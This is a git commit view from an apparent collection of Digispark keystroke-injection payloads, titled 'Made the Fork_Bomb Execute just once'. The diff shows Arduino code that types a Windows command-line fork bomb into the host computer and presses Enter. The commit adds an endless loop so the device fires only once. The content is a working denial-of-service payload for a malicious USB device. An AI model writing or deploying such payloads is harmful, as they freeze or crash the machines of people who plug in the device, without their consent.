Made the Fork_Bomb Execute just once

This commit is contained in:
CedArctic 2017-05-18 22:20:04 +03:00
parent a014cf94fc
commit 860effed1d
1 changed files with 3 additions and 0 deletions

View File

@ -21,4 +21,7 @@ void loop() {
DigiKeyboard.delay(500);
DigiKeyboard.print(F("for /l %x in (1,1,10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000) do start"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
for (;;) {
/*Stops the digispark from running the scipt again*/
}
}